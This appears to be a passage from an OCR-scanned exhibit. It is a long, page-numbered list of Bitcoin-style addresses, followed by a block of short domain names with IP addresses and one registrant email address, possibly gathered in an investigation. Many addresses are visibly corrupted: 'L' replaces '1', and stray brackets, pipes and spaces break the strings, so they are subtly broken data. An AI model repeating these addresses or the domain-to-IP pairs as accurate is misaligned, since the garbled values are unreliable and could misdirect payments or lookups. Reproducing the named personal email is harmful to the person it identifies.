1BZNMEw5d9UTcLP9cFpdUy2Bo3AGzxLUY3 
1BZnvZ2vs9vqxAhNET3aHuwGC7nF2kKHL91 
1BZUJ4tHUvFCsaeSyC8jBeZF89EKduPnH8 
1BZwZKACbfdMUykiG4JLL3pt1fSyZAYpcm 
1C1f2M57vKkz1LXNcsdoWJtu2Tqy5iVx4B 
1C1GjHc4euddNQ1lvq9CHnd45qKynFDonaKk 
1ClodXhx35s3xEh6qzXYPfaitENC9b9LHU 
1C1P85zBCsfkuRtQnjJFFSLA3ijp5geTPwN 
1C2U3Cu7HYGq2yFVvQB 1lcoaTqUpQiaYHNk 
1c3cJMi3CaR7KdcuG99cXVB88chGzTmiy 
1C3E4yVHxxjqujdi9TgrUZEdsQ460pnxVb 
1C3sw37makucGgz9HP3VS1t23xTP8Kb6iM 
1C3YeMBuRE2z36WhQeZg2dQb5ilwcVRg3y 
1C4dC6ARZQMx6Rq2hsSkT4GxxGkTXq5zn5F 
1C4EDQbaBs2V8hq6u4uAbBeMqpGV8QHPmf 
1C4ehC4LZR3CqYJXNzDFrosaLUVB2HUNkm 
1C4Wn6r7MHCm7wYeHEULUXesetoyqxhXZu 


25063 


1C5x9rRS3DGaeE1hq2D6PyEf4uragJBirm 
1C6fawur4smUWEBKbiCF 7DBmoc1Nv7gmdH 
LC6fEEGHmhgQQK83BWsMQ5fNLoC7rtqwPk 
1C6jGBSn8dPyS2VustVGEjbpS9xwn2kxXDW 
1C6qbk8XSSfcV5DDsnFVq3X3NrrojCMJkZ 
1C6RFzuV8fSr8faE3WW8b919KbZa9ExoDk 
1C6skqfoMmG44akH9HLV8KaQjeBvzi7 MMV 
1C6thR8Ze8U919aS7UAhitJsSK2ZMDQWFL 
1C6zc7MRCbUMb4UNQn9dihvf7wd74QwdZ7 
1C71MeDA8LCt1VbqCrmcicYBoqpRvmvVDz] 
1C7A9AanmhE2tjCbWaKbyx8aLkBhHCDzGp 
1C7Dmstqfezydgxc8YxxNsF8fjB5AR3JhQ 
1C7EM6udiLbwdjGqfA82UUcKNEmx7abywg 
1C7GtUBVkngTDjadunAfv5S3WK85x7Bn1p 
1C7HhrongsvBFG8PsbprGu6ybJ26KQQ3TD 
1C7hpKBqngVcG9SPxs4NbCgTtVKjuHOoPo 
1C7jy6QHMj2sFITEB4EVQxCsLuA55c9wwa 
1C82)3d66G8hfhQpymRhI1JkxknFQVrDPd1 
1C84JHSYZQTEWQ98VwuUUYWDWAQTZEXzIcg 
1C85HHHagGjUYrnoDbm6jFaWanwWt9WrSDZ 
1C8GpxSo3QBNtTeJ6JVy3gz5FTXD1fkVB7H 
1C8hGFUID5b78grVkKNavpkK6vmdeCpLLLF 
1C8KUmy5DygoLKpiikrDMMdatGHoKkPtp9 
1C80XDWuDLRuox8kN3KVDt2g1Uy6BCFsaS 
1C98bcUM1YINL5uYKonKXLKaMzC25tqATz 
1C9ARQCvs9JGbWpP7SG94Z2rywyjknra8U 
1C9buJ4dNo3EBtVoe2PA5Q2n7s9jR7Uqpc 
1C9k7kK8CNTZAGReRhVekkzaTba9pZ5Tj2K 
1C9KA8hWUUASCdDgq1EPB7PmcnFNghb1so2 
1C9rStQ8ZTxr2Poo06f67cqYNmigByswnse 
1CA17YeP98XZptESuUVR69ZpzZNjaNuA7bjV 
1CA5448dRw5ycGnEUh6Qj3HWHDyaSVXCFg 
1Ca7XTb1JZYK89hvdHrVshFo8SB8vd2)JB 
1CAakKFd7FQseBffNEgzM7ulTnHzB8poxtTa 
1LCAApxKMtnbbNvKX1nkaE2ebUFhIRfJdvq 
25064 


LCAAVLXigKSHyaRFH3ShcjoaJhaMvVb9dy 
1LCAgbymvHhUkGjHt8goCQ9YnJwKNbzv1lwn 
1CaHh5sJkxtVed9cMjoweGUZMdmqCEphsv 
LCAK2CAFtpz2TGei6HTtN9 7MvgqdEToVnp 
1CAQ5QgBEgFhXbkfz8dh8PYQ61GUNUKhCD 
1cas3ASA7QKUHDGPw29CM1DJn1K92vGcf 
1CawSRCk9JDS6jCe8Tyh1KgtMECUAMUTQv 
1CAy2BDzn7uryz9rKBeNv4VmUcvedZPeud 
1Cb2KdEcFZTAKhPjwizToptUQ5nqUXTY2b 
1CbG1xkavWaJsorQrNCFJ9VJY9mpz2be2D 
1cBhd2avNauAoKJwWw4C1zSkMQpSRQQbH 
LCbNZX5M6r5kPYNE5V16n45m5f2jJZbFro 
1CBoQ4yoaaiuWjttfRGS6ETXZxc6YCNBFt 
1CBPLXQZAXDfydn6Aoxf8WxXfaxSMJp408v 
1CbtU4gMpptm5NmewrEnb1QQSDvF8Qx9Ss 
1Cbu5SBP2ThUb32JPSeMHLumE4UjRcXdkD 
1CbZFeWjUZXjXzPC12M7cveX3Hu3nZ1bnr 
1CC2Lzm7swbymDLES3UXdDWd8Mg8x4thsr 
1Cccn3QbGa9nY3KNW4D2xoEjNHz9j62btz 
1CCcrrvQvBxzEZ2WB2W43dcUQCDpuyWWUcB 
1CcdgMN1UFopBGjFG8d5zupBT6UDWwcDNNR 
1CCmzWtkrxqUuUA2czmEiCBFyKY1D4C22yMr 
1CcnFR8x2gZoV79wrRXiAcaUcp7CW5eM2] 
1Cd1UXTzKzdJMSsnJucKPjtmDgUDFF5t91 
1Cd3uyQgM5o0dZg8r5kQNt6W55WiaW7KZE6 
1Cd5KXEdHBG8PfGMLF5kgGPfg3quWcmVr3 
1CDeN2XrdSLjtLzFhFvgZiTxxKid8XeNtj 
1CdfqecixS9eWGZZPZ7Koh1jS3VCb2T5cm 
1CDizpCLuQTZ1feJSQkmgGquosvEUQa9KQ 
1CDonrdnspjRJ3rxkN85vdmFjco2MrkFCf 
1CDovFFdMPx6AMWgF8F8cfBVFHPNrKoPpZ 
1CdU8mBnXJSM8KAugtNS9dKutXNqjkKQHzD 
1CdWs3Epiz7ZN3nX7Srnh6tUvBmkknCUm9 
1Cdwskf8HjkLGcUKyyg4fNKyUd2f9YPAbd 
1Ce9qY3unPuzf6W 7U1lvvgwSA177SdfP6q4 


25065 


1CEaU3KLxCfwdeuoWu6ZzdcZKYeA6zZLMYX 
1CebDHbrMpkC)]ba4VHTQAVhBiwkkhYyhxb 
1CeD3uJoYduLUW31nU7GoKQ3sj5AvUtR3a 
1CeFr8PjF9jteC7 mDzwa5zJCXVWsqv8z3X 
1Cehde8Uh5cDD8xzeFALFHgAGv7ranGw3S 
LCEiPGS9GK28zcugEQJh4neCéxXRJizbi8L 
LCEyThbf5NHuHZWJmYzFts71UdvjDJVNfA 
1Cf4s5 7ErgQJAibuE3tzcWUPJaBpKb2GAc 
LCFLOJYjJS48Nv5nHgEMhXiqz5JKvU2kvTv 
1LCFMGi86x0o2WNmVab8pN2vwuWzj3MugpmU 
1CFnyTB5ewvVRuFtM3RsjyP6xLQXqiWGTB 
1LCFTfNyXJZ3TXjuFfFYEF7ae8QWUsPp7BG4 
1CfvXZuzF9tZZHSYchgquzurQWoVBVKXkd 
LCFW1vnV93jBmHuiBQ9VKRnN4H8HQEqBfDu 
1LCFwT2X4wp7DsDegHUYDJgE7UbGbkALxbm 
1CfyrpCCskfYfDZmLYmrGLxXr6CXRus5NDp 
LCgATxj7PMUmUd5 1lirwcVHsK3kCfyxHBnQ 
1CGdXQGvg6PmnfMS88aVCq9zurxHmadclk 
1CGg66gw3pJWMfe7ucNxcQqEG3uxw6ya6V 
1Cggm5xDc1FzxFJxqrPo9ZSHXBCmu6aWAS 
1LCGMjNi8DgQWSNGJoFibhkDcjJpNzadRbs 
1Cgpj69A97jqecfHorB4UzzvF41xyF5HaD 
1CgPjiKbG5yMMUaJB4Z4WTSagcWFbs27Eq 
1CgPV4uH4u4 Xbt69vpawHvAJhplLWQxQEXxq 
1Ch3JHQtLEQR4a5YuBSbXHGkbar9pkp3jj 
1LCh8NqxgDcQmLwhX6A8q22pywrAN28YwgY 
1ChdiWsRrMfPA259TzGnCoygXqZ9aK8XEp 
LChR8THLu5f1Y7qZqLhZDfhTrNLcH2Pio9 
1Ci3kSS59KRGew4MoShMycSLNro5VyCdfc 
1Ci7zndBcT2dbe27TSQFTENXSNtJ19dggw 
1LCiyGmoWQAd6iIQ8TWIQRkKCW1nSRpVFxcD8 
1CizDDC4xg4HQK8joJJEVearmRQYKrh2KV 
1CJacKrEGFL7eTKXC7Em2gsmX5K7nSRKf3 
1CjcC8gd6GjDZHuULHvuxXhpAJG4GqwGhvfw 
1CjcyKowFN8FmMAQW5ZUEdxS88co2pHTuly 
25066 


1CjE4u6zsfwiqsAxFfan4kheWvMUi32yD4 
1LCjFGlut9feQ6DyB721j29FJLt9xMJLaGz 
1CjH3PxWbcZGEosGuaCcypeVC7Suz29XnN 
1C)GQ6QkM2yqyApZQBbKyZadS9VDBeb5cQ 
1CjstVyNCaVcZ8gMFeW8N4w85BbuEdRNay 
LCjJTBzwmJbBVvRZCd2Zfzhrsi78FudtckU 
1CJTK96xQFRD23KCDtRypmi3bwcHrKTKxx 
1LCjUrfkvtZYVyHwu5ycx8cJTmM5YoUY7pwK 
1CJVfuPxVrpmzjKxsV1lur284EwzZHJYHnWB 
LCjWNtTnt1FkuKL4uCM13eLFArn]DMC2ps 
1CJYbm14TUtL5whc9WRbXVUAg3BircgeUAs 
1CK6WPdyeoP71cRCRUXZwxAdUPAKra2Mgf 
1CKDK8qoWP1DYrCPudZyTH3LE7BB3C6W73 
1CKGj5iBiZcay71i7wVbPZuPqWm68y8PRr 
LCKjJZMPPNcxz9d8Yqt2Z6k5tU8HZxKGo5x 
LCKKUKKMf82fxrzGTgPNr397ovKiYh6p9E 
1CKndEbH3YFiw5LQNmjHiNQBo8GoN2pTdd 
1CkriC51XTsrRdyi9sMskKTokDrFWH2GLn 
1LCkSyo5YnAJZGY1VuFzfxYYZAefiYW9J8V 
1CKV1NuQeuaq2izEp6TsbQrwGt7SG4C9mM 
1CKZZE1ZfSUULkK9rzks1jircUGFN2NnU8f 
1CLbmhfQH15suxyRP6YDq3fNr3vroUkDHb 
1CLc4EfYtzR6OBWtfVdNS1SCj4pVEWDD8Ka 
1CLG5V4whjJRkmtr86EdS3yMVqo1BDhCxV 
1CLKws86Tq6mm3CzRjRQcBZTiIZyCjS4667 
LCLMNgEdx2TAvzHe49kA2 TctbwoaE]Kspe 
1CLt1XmD13fRJYFVt64Z9F9ImMmMCpd75vQ2XxX 
1CLtJS8bHL3ujNMxuzDN1X6d8BEm212txy 
1CLvjXwgasY6ifg6LSwAnHq9WYiwTd99q2 
1LCM6NPowjdhPWpGaMKuNiXRHke9xgt3XXxV 
LCM6q3RWYcE28hm6CBojviVN7MYYwRRdiQ 
Llcm8n9WkfuWKKGGLi92xNaKcBRxCr7xgx 
1CmcoUdcjxX5ejiBMvLTFZK7TdPWNpJ9jCU 
1CMdLyjaz46VpwqcnMeSKtjA8jrcPNxush 
1CmE1s4j2usNm6weCar2ewTGzhMaTl 75fhn 


25067 


1CmgcPiDAJeeibrN2XfBvaJr4adHsHujZQ 
LCmKwwCixNCFq9FubiJvnPZtcNWqUfH8bS 
1CmmilmDVDRSErpXsi3QZkWjk71p1WuY1v 
1CmpzebG9wkgPONbYa4k9wytYUuScxaEzT 
1CmzcNSsiohahgbAHvf85RDJVUV1ASUhdc 
1CN1gYN8y8nuJ3R8WJBNKHC3bf6fWYthuk 
1CnCZrhQdG47kEXA3HZH7ZGAbsDeDs4XAc 
1CNGoXgv1LVwjpMpKfp7MhSKq8nRo9DxRv 
1CnKRvcpk3GZcki6pMbG8Pgs2ZJLPVKZ2m 
1CnkTT5B2AJ8BnybSxdCmDEALAPFU56aLe 
LCNqZBEQtGoWjrsTLHS90TLqE8ytjgbiwm 
1CnVD2x89U0Px6RrvYTeknGkVSxqKky46yp 
LCNXvg5HQkwwogfVm2kTG2rDy8S4rWA4ecx 
1CoEQMHQ16euHF8x8ecyV5DkaZCYcwvzXa 
1CoGEsgSzTnjyvfxTe8T89vHqo2HnDiFKh 
1CotRcfNKkrxBroPtavm7c4RAVns79cy6C 
1CozVojst363psYFgPdbRZoxNRSbs8R2Rh 
1LCP3nNHIMM2Aq3kvMmEKfaxXdp95dCtgj2Fj 
1CP4emWw9NghrN2dmjd3DoKZETTKgTMUvB 
1CpgjqvA2ayHQ2fGUorhqis9MH9KpivPUY 
1CpgQBv4VeKBR8MzkKrghV4bcYTa3VXsnt7 
1LCPJ6kfXABG2xvetZMFQjLnNLaoygq85TXC 
LCPKCDFTg4kZdadQX4i2wv55JPyXnLnung 
1LCPKxaQfZbV225ZtT4isGS9ejPWX5kBEjt 
1CPONiTBHT3K58j371uVeKKFSVYNVokopo 
LCPQRhKYSHRWNHMqmdMivSWBfviYrVPWVj 
1CptY54LWUMdDukxxBV9PcpbDuzswrEAXY 
1CPukfQKrsm5bVs5ZcR2eP74zz]jY1jqw7 
1CpuoHmTqQfrVRgj69AaPtuGgNedKhCkyw 
1CpVQJcyGZ8bkV7HrDWHr4H5HjWupagzc7 
1CPVuz3nLmV4oTgKmWSV5GzzptvmnhVSCj 
1LCPWotBWAe55fU3c3p5zhsNsBw2TEFgRBb 
1CQ2iM4o0pqxRECxVv2Q21PUTCKYNZkTj5c 
1CqaldJdPVVThB5M1c564ZNWHwjxCRh2C9 
1CQARe4a5Baqarf7HdRmMfeBSCjyhVDK8BY 
25068 


1CqB9RTHCcdR2bGJBsUptygsq6SMk426X7 
1Cqd2qAHHoRo9gWcbey4FJGQUpZ2x3i6xH 
1CqD6Y6XjRALDseXBeMhMZaQ3CTItBP8Ns 
1Cqi28SBfmWebynNZGhSof7K6ZjRpKaQWo 
1CQj4uBP9gPgLedNHCHiJjFCuW9wzkLLko 
1CqPiMobRdRenwb3hWp8wQmogf3uGSjknDT 
1CqRjrkKQM7bykqUMKzDD9gQL6C8ZVBsSNTv 
1CQsZh55r9rh7qSAJmnUNFDw3PWA2uoySg 
1cqWTre5RUqLFWgkK9mz4NkDvpeT2GSZ2k 
1CR9O2CVFq3aUV8hhR4Cyr9g3KwymmyYsreP 
1LCR9YIF5PKzZgkjjJSJpjCoZNkGwqPM5BsoB 
1CrBKKRyo4MEuu4RurEqnCnpRsp4GRvpx3 
1Crewphfse9GjqSWNcvAUSjWrxBT4nC4Mu 
1Crf9xMwXESsF24YSk5aowy4ELu65esUw1 
1CRg6Wjea9Gad1s]xoMZoShEmvaSAGhHNQg 
LCRHjJWQYG6AFJCHNTrVw5y8TShEqVunoaw 
1LCRJa6VTtiFEcReZjpbLWtHBmMXKkdUTW3bv 
1CRjKkqF 36Q9Jw3ULAUEWBCE4sTdcEgbWH 
1CrW2Rhygrq85TymVPwwUfC6E2KXxFDeqNn 
1CRxWueYLq5Ewx44915sR3zG5voy8mQ|JW4 
1CS3AyeQhDU6usKMCiIRNWSvGBJzbFhpYQr 
1CSab7BXhGcujRdXhEJ4sCQZ5RrdPWEyQB 
1CsbYMV5nrd4NP2etTpFpDmEyp6p4NjVNJ 
1CsDQxXARMxd7aE54WSxyiFwENNSSVsF8V7 
1CsGledZ5uRnwzEu2zK5nxXh3xsSaSL43Wu 
1CsR32D2rY7FXkDVh474fsyBcdEfi52zqy 
LCSWYrMgcRMJ)KgViIGBNcPxyPrDppfWp7jT 
1CSZWFD25pZq2x7hvu67CKMTU3LZKVDp4T 
1LCtBLFS91G806L4Tk6t7UiviqQzJMKgejP 
1LCTD7HZLrLnwXB1liQv5uh3ELDKbX7Zhaqq 
1CtDsnXw4839fSHTXV8UVhA2rpXw6BSzjb 
1CthcSgC48cZL3kKWtGE8vVZnYdjx4uxRi2 
LCthM5bHMNr94QDeJYmN3KXoQw5uCx5uSu 
1CTTRzZ6LcL3aWGPXTARTJy6GppqF4RwxL4 
1LCTxr9PmMZWMzwynhDQma2SBZuYbDDDG5k9M 


25069 


1CtZQuTMafisLHMnkn21ijK92TLCQxGwqu 
1Cu3s4LSb6NZ2j2n53G4YnADC9gX1VCXEQ 
1CuAc4bVDximzmh1VXyYnLikMhzcGSjGLN 
1CUAraldXGNPv4SwpVxJ1TF6aDbB7K8kqk 
LCUAYPiXuLZXi7DNBnoZ7wQEBTROYP6HKo 
1Cuco4dCP2QFsrtjBvZ8wuoPMbvnmkSJCE 
1CUeCiNyEbnV8Lf1jWd7BQHMnmUEH8R552 
LCUEL8MVWapQC4HEhXe42EybNPT5gMcA8c 
LCUHZk4rY1YYFByCm3YiGPpwf68wWvgaxj 
1CuQruYyLNqriYn2Pem6xfZafvPWR9YEkkm 
1CuRGSdJKxrkew1RfD6rro5b5KUNt5ROoKP 
LCUU8foLWDZYLJyfojRfvvS15ZSm3jHVLm 
1Cv13BUEkVzodfteVVMPnNHvcTmFuWVVWC 
1Cv4sBBXKtwZNzvyHpFEjHf9SbGMueuvL6 
1CvcVnELmnNwCfRvbfsche9pAQqNKdbEiz 
1CVJGWmFrhiG5a6UoyAvuTgFRVXtQhkzos 
1CvJVyGKS1ACu2dZA17FK3xDkgVnr5KL5m 
1CVLKcRolHedsGRW8J8aMLX3RjgCH3jp1S 
LCVNJCuUS2cn5234m5W8o0MSucc3ulRos9s 
1LCVRuDRZJHhJvf5dzED6rrCNqFJdhdXcxF 
1CvS9c747PoVjASeU4ghNVEmhdE1Vqws8H 
1CVsxiCdNqHqKhkRzDk3dRsxxVEQzbkq39 
1CVTe2kYMBRJfKVVKjd2nHtdP6qWecShqz 
1CvZEoAkKF7W5fkKXnzDTmc7DFJxXBM4Wu6H 
1Cw2Pb9B2WsbdBekrxrGMPBLa8u2vh9kh] 
LCW3W2zbGCz9E2pfiefmfeHeDjFyha6Efh 
1CWfgUz1S90cCYTYwdvTcAWTCuc9iE7hzn 
1Cwhwd7mosDJ9RTXfinkALLWvuoxm/7ercF 
LCWjg28b1GftK7KSeJEFjwripoeLMVztb2 
LCWKJ 7LJ8XVtWc4SqU8ndxxKXDLnTztSha 
LCWLnDpf2agd94Gy63jUmMXxvAUWD4VbmxXv 
1Cwos2RRXzcuvTZKURSWK77hrqexLxMgcQ 
LCWtCO6jL3HHQXJhJTxkXbmPYr978brY7Za 
1CwukpHYiSyRHBBtxy3vEbPeoayfiFyZG2 
LCwVZQEQ830PVizpuMwiY XHpujRzZ5y2MH 
25070 


1L1CwWKLmn95veffPmUzCztgnrmbx81LUKLNn 
1CwxcDazTJk7h1BJwpABMLBqVajxCrP41c 
LCWYVWN34toVmWxYRVU2ngGQiYs9takB8a 
1Cx IMWAQUoWgoBAnnMgsLSsTzajLPSzmDV 
1CX5v9MBvLuTWg9ji4SjYxaQ2MiBxnk7dy 
1CXfmb7PwVyLBmsJRdhBo4tNRNixh2aiTq 
1CxgDTzZ6QZYio9aLKaMxLo8KTp2T4r6xDd 
1CXGtNp2xxeNe2JaQme4WAtWchGBrFWr]j 
1CXj9Q56FTbEoKqu5kUVkvZkGfWp1LiLrbH 
1CxoFuHttzXkbkJks3QM3znxk7anYKLViS 
1CXPjF9yaJiUgQvXHZrYNAFJR9VnNokWntx 
1CXPPhRR2io8P8LACGXnB8LyWya3HmCq1K 
1CY68wXpbWXWeParSbCDf7Jey5rdK14YRG 
1LCY7MnqvedYX5z93qk2HrPAM 7ujMrRwqxa 
1Cy8AbHKMZWTBSJJhJtnUCXrvdfV9wCjcD 
1Cy8e4DE9vacwaRepGckKtukf42WjQvfSGW 
1CycofSwhCBfgZskKFpPy9Ad7gBfeHp7cqc 
1CYebAuPt6rhdY1lzwhyiMGtxcP21NiyJb7 
LCYLjt1TmMmwLrWxvkCqcFNgFuzyUMnzWBn 
1CynqCoJYaLX]pS7gchCFNBb4ATK4Wj7uG 
1CYswnC341M4SJ25qCP9pEXs80eNxSuukr 
LCyUFFxw73WTiQsQ9zxmWZfb2GFH58JkWn 
LCYWXL1ZNZKnhRdgRxcvdpUWTs7otM263a 
1CyzsdG646Nckj3ZeaLx7PQQLVLr8pUVQX 
1CZ6eFgvxX2e7VwjJVLUcgBeeZn62nbhmkAP 
1LCZAMLFzehUxUuDaE6F bkaftkDj6Umgikz 
1CzaXKcUE13upS20M8hbSFkgPtM1AkzHvU 
1CZDQ7CVhCdHU8DAXvcu7xCTiAJ4px9ESi 
1CZmgUdZv4kxqeKkf505 7Ed3MUze4RJ4kD9 
1CzRvbieMNvy9iLfFvwqG6AzZya5txPpBw 
1CZRZGTAL8qkM37LZgbSeTM80AovjWo2Nz 
1CZwR8db6GzahBmxkoet96dsTaWY64GFUU 
1CZxJPKBTD2N3fluFhR9WeSUfHXEq5zLqY 
1Czy20hBS9WTc9M81McZ8ktbm2qr8wN406 
1DlaQgy3rGYm8JeY2rTpzMZW3YV61WsDDB 


25071 


1D1DakdV3WvcsSGdVFnFwzjPacjhuQkzVT 
1D1ION5UQ9jDXtvh13cKQB4jsf7ua8vFGJP 
1D1X7UJfzvTw5afQDtMrRG2dMErRV6Lk80 
1D1y4xjD3aQdPNKXVkcGv5kfZdGJAo8gd5 
1D22PdZXEZoAHqV4DJnXUtZiF5dRBDHgYG 
1D23rboPS7PeKoDtuDRvsxE44vokuFRbVD 
1D2b1dojvx7JJ6uUzZHpkihgf]JZYTApoLm 
1D2fVowdMbj8FP9saemoqXuMjF3Zmx6gSh 
1D2qNUCWHZcFkb20PJCKrgxbUQYHdJF96d 
1D36Vbx38jBTCBULt7HjVAkyw7e9U09k4K 
1D3f3ZFGC1IRFTGvVUNh7nwshyXGpYmn1YLd 
1D3Gs3gtnVnw7NPgsYGV6pQ3eLP952YWLY 
1D3sqsTQ9QUOHYnU618mjJNE1ldw2RWP1Sdn 
1D3weeL3X4A2SqaKFBrgAHbu6L4zCYwRFL 
1D3WXPb3RrqfuUqsyWZQ2vdXeQDqUpHEzi 
1D3y645yFRxFNtjY2uTpCEdMaZbZ1tRMUY 
1D4B4ilvcsASqZsSSpYQgRHZs7AkV6PN6z 
1D4eyjNiHELps2XvCuT 7QSCbCFlgeePa4Nn 
1D4JBfoSTocZp1Gjsc91SuqG2UkRm7ZaXD 
1D4uV4iJyJMnXGTZHa7LQS1w2u6XVqdwhZ 
1D4VCQrANs5zW3y6HrnwtLZfCRYr52yiwd 
1D4yvLhuhWZMnipyJUVR83phj9ie5paxZc 
1D5CRRyGQAozqCCuDzE34KUDUooYePAJCP 
LD5fHYTc4bB2vSKSjBuhh264uimgCjJbP1T 
1D5MJoAkrdp25uNh67qcnfTZ6Swy82sMTB 
1D5urLWBQVpPUaeQfR6HoumOQrtFY 7agf1x 
1LD5VXfAZr7bHZq8yHbLKyYAuobfroxFFn2 
1D5XwlgocXGTihQ9Ge1lFH2kkWQFCUvd33s 
1D6B8CdxgiSVNy3fWdvYdhQAyNc9H5Yfwa 
1D6f8nHtt2nztvnJZgp8TPpgUdVEjm541x 
1D6JsJWtGMWHGGgd2HpYCra8s2hmGZQmwM 
1LD6nigqY4nbkQ1Kr9Ymwa3M4yNDuUFc5cUJ 
1D6sAM9xokPYp5kM6rb4agE83No9iY5GGz 
LD6T1IVjJHNNUqVdjsjNXUq92ucGtQtHRKem 
1D6wCvZCw7MmH65VUyQWUaQGrmvJJAKio3NS 
25072 


kowipe .net - 206.51.230.92 
kerobo .net - 206.51.230.90 
gelupe .net - 206.51.230.104 
fuquwe .net - 206.51.230.103 
hyduve .net - 206.51.230.200 
bisehu .net - 206.51.230.99 
wypule .net - 206.51.230.95 
xylucy .net - 206.51.230.97 
xulady .net - 206.51.230.96 
lyqyte .net - 206.51.230.94 


nimygu .net - 206.51.230.96 

zuziki .net - 206.51.230.98 

symiza .net - 206.51.230.99 

bisehu .net - 206.51.230.99 

msrxdk .com - 188.72.192.78 - Email: charlenecrewshgkn@yahoo.com 
kimuka .net - 188.72.192.78 - Email: charlenecrewshgkn@yahoo.com 
ylkbin .com - 188.72.192.81 


2510 


1D6wemR3SW27M6wol4Bv3cp8GSfK6QMK4a 
1D7i2SgRkbfeWHg9eReEKX1A3ZM44WK2APX 
1D7n9qB8fqEHcGKPUwwgbxhjRdzGG4TEV1 
1D7pMXuVUJgqd64Z2r1lnvoF1l3pvTQN5iMxU 
1D7VNzikruWZ3GGzPfHVgc3CRshPmF7xTa 
1D7zhjT7wwYCCSnfbhFR4R61SDEzYiB2uQ 
1D8AN5je5AvEJ7mGsFACHiCRAqMuVYMBSx 
1D8CsiUSj4E2YwMzxDpUteZQiVCDWrTghe 
1D8envXudrap4pUfeW] 7CE9ezjEjT953n5 
1D8JtDPu57 7tUfKlyUoyuma8bA7eF2SaZq 
LD8KQAAiAr4mbhrLDgZCiEixFYVACHMHB8 
1D8ptJsg7XXZRBT8QHcLq9qXyd7rrosYGa 
1D8QmMW1svMCMUsFrPtm3B9gtU8qYrmAmyK 
1D8qnN27jwnZiF4skKnrmvle4pKggYL3U7 
1D8QsotDdAbGqKUMCxBHqMGFbK5ho8zfjb 
1D8Vc5et3tM6HMaSLJLnK6EZUERYa64zR) 
1D8vWFa9VELAXvM2vaoGXZeb3JebX4A5hn 
1D95nEsxGa5J5042k9dsa8Z475NmALtaQD 
1D9876LytE8DgrdFMWV6E4hJJzF1xXTocT 
1D9i8zepKfAvvaEFmPEdtVD24nFhPcWnRM 
1D9m8aAevTinFDRjmMM2dBMAUDyJJA7USNJ 
1D90fKpRd5p02239aG8aGwr21v5aiph46s 
1D9sdWrZ2nEHwsZVwuGbTb2rLMkamsy14Y 
1D9XkbBVg55YVCqzVGUMHsrygVpsc2DxjC 
1D9yMGDHyg1FNHZGxNkNQSoBhD4QxHGmyD 
1DAdgc9Yw1n87rZELQrqBvAvRC2WmiJn9c 
1DaDU636WkCz5YKXqzEr16p2BYdHJRMnL9 
1LDAJnLlhvRWkgqM6k78VVQpHTjzPYMK2aie 
1DAn81aL2tMnyjdz5fay5F7uYVdZx424G2 
1DauU14satXqgWNqU9SWL7C8waqgxqiRAtp 
1LDb1kEt3rm4cRCW27s1CZg3sqFKt53iGoZ 
1DbatCUhySaa7SZtYrzGxQ5QCzcVJsuDCN 
LDBC9MiqykZTbbEy4NYnDBbXPMXrC6JxkY 
1LDbESkrMybXT 7uqWcavGsJ7Jk49q4Psbem 
1DBLdigDc4b88ih4pyLByEB6v2qCUTyii4 
25073 


LDBqPWfZM78nHvjyxL2of1VbDVT2qQpi5f 
1Dbs7qi5BKbfQSfVsZGGneouiDGMKfKejt 
LDBtNGguhcnyxH5RjjYwrBfHansAw7pFF5 
1DBU7m8z2KTp8cAB3MTpE4bHaFYAC1dwRH 
1DBueqFqBFo5M3A7XZ8LtBxBUny1S2Hf7C 
1DBZdT4CgqAAGqb8u81D3f783qVW71u2w1 
1DcFC3D32wAZnaytxrboh2wnk3eRsT2uhA 
1DcFJFUeYa5GGg2DUX7eqY22eeSzdNxxUK 
LDCjSn3NUfqNeyT3A9qKjQdBKkyvjjDt6P 
L1DCSQUf9PgB8ne51h8YLP67yTDSNHVMWd6 
LDctLQZhW3YVjBSf3ZkJRxVK4ah7we2cav 
1DCVEugh6ouprpjJ4gfRbDdLR6WC32Az6jS 
1DCvw8sDpua4d7xPyUAtgxReswGBB75S5X 
1LDcvYHpZTSrkibxTu6JkUvqxXV4cunHyrbA 
1DD2mFQh9dgjuBMXBErmxXr8gTRsyy2PcWp 
1DDeWpu7NGcKfH1uE7bZpevr4NCt8Crbd3 
1DDg2Zv4rm2tDUG6KHiUjwCMVprfQnuiNm 
1DdgW3aafjBEYFNF2tFfZeiFrqhYbjsbh3 
1DDhCBmamNGZ5o0VpnucwjbQrY2gHLaXxzbb 
1DDhcNkZtWpnhxfvCwV5c6QGk1EmahZWPu 
LDDL4hv1iciDqpxJZRsifFcEZ YeuoZGXs2i 
1DdUKKb29dVy6UrBgaRu41mKCf7NuThlaG 
1DDYLiurH7Vyud8774UpwdNSB1Xu56sP3w 
1DE2byxU3sXMvXbQhMDBu8FLDzc71YLr3T 
1De5Pqb5T5DM52CpQXFHt4vntuk6r9yrKP 
1De6fJzlvvCkQQ4KrTCoknqFRu1LwilyZb 
1DE74u9cmDyhsAFHPbiaz4DWpH3ksn9NRq 
1DedkK945FAqzqniz57S5sZvmPMyigPXujQ 
1dEf7ErxFXa80KmQAD7UcdCR3ZArCkwFN 
1DehtMwjTaSLPAfnHRjsubB55J3kVuBiMe 
1DEm5XcU2th1JZw4YNMc4Ausg9NK1qLpaC 
LDEpNJp2NSDqyNwoC8PXA2FMvmskKSrjdbE 
1DevjunAQBJsBfdol1BQHbjJSHUN8THK5dBx 
1DF6i4UfBdCjmunsJHMJTva8D3RYdvSMsr 
1Df7ryneUZ9v1SSnsdbCmg1N1K1d7Z2uPe 
25074 


1Dfa3F7vXvUGSXaNtGQjFTvcsshNtx5LRZ 
1DfAavKsn36Te7FHSrzoxXbw9osdPT xeVu9 
1DfaC) 7 HnFMuCoTCS3fuep3d7wE8DgEadT 
1DFb7qgaL27BBAxT6zm5tgazamXKWXHWBi6 
1DFFqzhRk667fcMr7RBUocZuupQayTcMCA 
1DfhxMMxRd14eaWxwqQ7bULFsN1MmqiTQ9 
1Dfj8vdhuMVdrTi2Dx3PMQDYCtmN6Ae4BH 
1DFJM42aLtWakr2LK4XuEPMTvbq29iY9n8 
1Dfq4wcnyttZL91DgF2zT14ECbiqa5wHQ1 
1Dfsla7VRFqcjMFzvawMKWblisTKf84Tj2 
1DftJhH5WeyvM9N92A5F8yuWZ6qBFTVQZq 
1DFZRGV494eUZ48QBgakx7eGaDC3SakCJ7 
1DG3b6j8SpflkoYZyjjLaQwHZvcMzYnD9Qi 
1Dg4vPNtTnnuBuu50Vz4YZggJBEGLL3Wo 
1Dg5x3yCh1HskKvhluc5h4kRzxUP416xpGo 
1Dg9NyHGKyNtYpz6CAVh6fxwHgYno4AzCs 
1DGd7QTaLpHvPFclixSQCQfmcN8HTgH4ANt 
1DGDyiUyesHjVj lsEnVD9VPugsvgx5Uga9 
